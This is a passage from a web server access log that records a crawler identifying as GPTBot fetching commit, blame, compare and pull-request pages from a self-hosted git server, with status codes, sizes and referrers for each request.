AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:16:37:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14309] [Gzip 4.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:16:37:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9955] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=open&type=all" +[17/Feb/2026:16:37:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14310] [Gzip 4.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:16:37:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/README.md?display=source" [Client 74.7.227.38] [Length 11795] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/README.md" +[17/Feb/2026:16:37:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-next-todo.md?display=source" [Client 74.7.227.38] [Length 13230] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-next-todo.md" +[17/Feb/2026:16:37:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-next-todo.md?display=source" [Client 74.7.227.38] [Length 13230] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-next-todo.md" +[17/Feb/2026:16:37:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/vite.config.ts?display=rendered" [Client 74.7.227.38] [Length 10915] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/vite.config.ts" +[17/Feb/2026:16:37:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/explore/repos?language=Python&q=&sort=recentupdate" [Client 74.7.227.38] [Length 6313] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/repos" +[17/Feb/2026:16:37:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 9839] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/asset_pilot_orangepi.tar.gz" +[17/Feb/2026:16:37:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 9962] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" +[17/Feb/2026:16:37:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin" +[17/Feb/2026:16:37:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin" +[17/Feb/2026:16:37:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/pyvenv.cfg" +[17/Feb/2026:16:37:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/pyvenv.cfg" +[17/Feb/2026:16:37:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9986] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=all&type=all" +[17/Feb/2026:16:37:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9976] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=all&type=all" +[17/Feb/2026:16:37:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_upload/main/asset_pilot_docker/.venv/bin" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin" +[17/Feb/2026:16:37:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_upload/main/asset_pilot_docker/.venv/bin" +[17/Feb/2026:16:37:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fobj%2fDebug%2fnet8.0%2fOpcUaMinimal.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 21629] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" +[17/Feb/2026:16:37:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/vite.config.ts?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/vite.config.ts" +[17/Feb/2026:16:37:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/.gitignore?display=source" [Client 74.7.227.38] [Length 11514] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/.gitignore" +[17/Feb/2026:16:37:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10908] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/.gitignore" +[17/Feb/2026:16:37:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/vite.config.ts?display=rendered" [Client 74.7.227.38] [Length 10914] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/vite.config.ts" +[17/Feb/2026:16:37:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fobj%2fDebug%2fnet8.0%2f.NETCoreApp%2cVersion%3dv8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 21415] [Gzip 3.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" +[17/Feb/2026:16:37:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/vite.config.ts?display=rendered" [Client 74.7.227.38] [Length 10908] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/vite.config.ts" +[17/Feb/2026:16:37:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/vite.config.ts?display=source" [Client 74.7.227.38] [Length 11980] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/vite.config.ts" +[17/Feb/2026:16:37:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9938] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:16:37:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/vite.config.ts?display=source" [Client 74.7.227.38] [Length 11981] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/vite.config.ts" +[17/Feb/2026:16:37:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/types.ts?display=rendered" [Client 74.7.227.38] [Length 10905] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/types.ts" +[17/Feb/2026:16:37:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/vite.config.ts?display=rendered" [Client 74.7.227.38] [Length 10911] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/vite.config.ts" +[17/Feb/2026:16:37:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/compare/main...main?expand=1" [Client 74.7.227.38] [Length 8398] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" +[17/Feb/2026:16:37:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 11217] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:37:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 11217] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:37:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 10528] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:16:37:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 11218] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:37:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 14257] [Gzip 8.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:16:37:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 91] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:37:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9937] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=mostcomment&state=all&type=all" +[17/Feb/2026:16:37:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 11217] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:37:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 11218] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:37:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 11218] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:37:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/compare/main...main" [Client 74.7.227.38] [Length 8384] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/compare/main...main?expand=1" +[17/Feb/2026:16:37:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/compare/main..main" [Client 74.7.227.38] [Length 8362] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/compare/main...main?expand=1" +[17/Feb/2026:16:37:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:37:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:37:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:37:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 10173] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:37:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 10172] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:37:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9956] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=nearduedate&state=all&type=all" +[17/Feb/2026:16:37:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:37:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:37:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:16:37:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 10170] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, 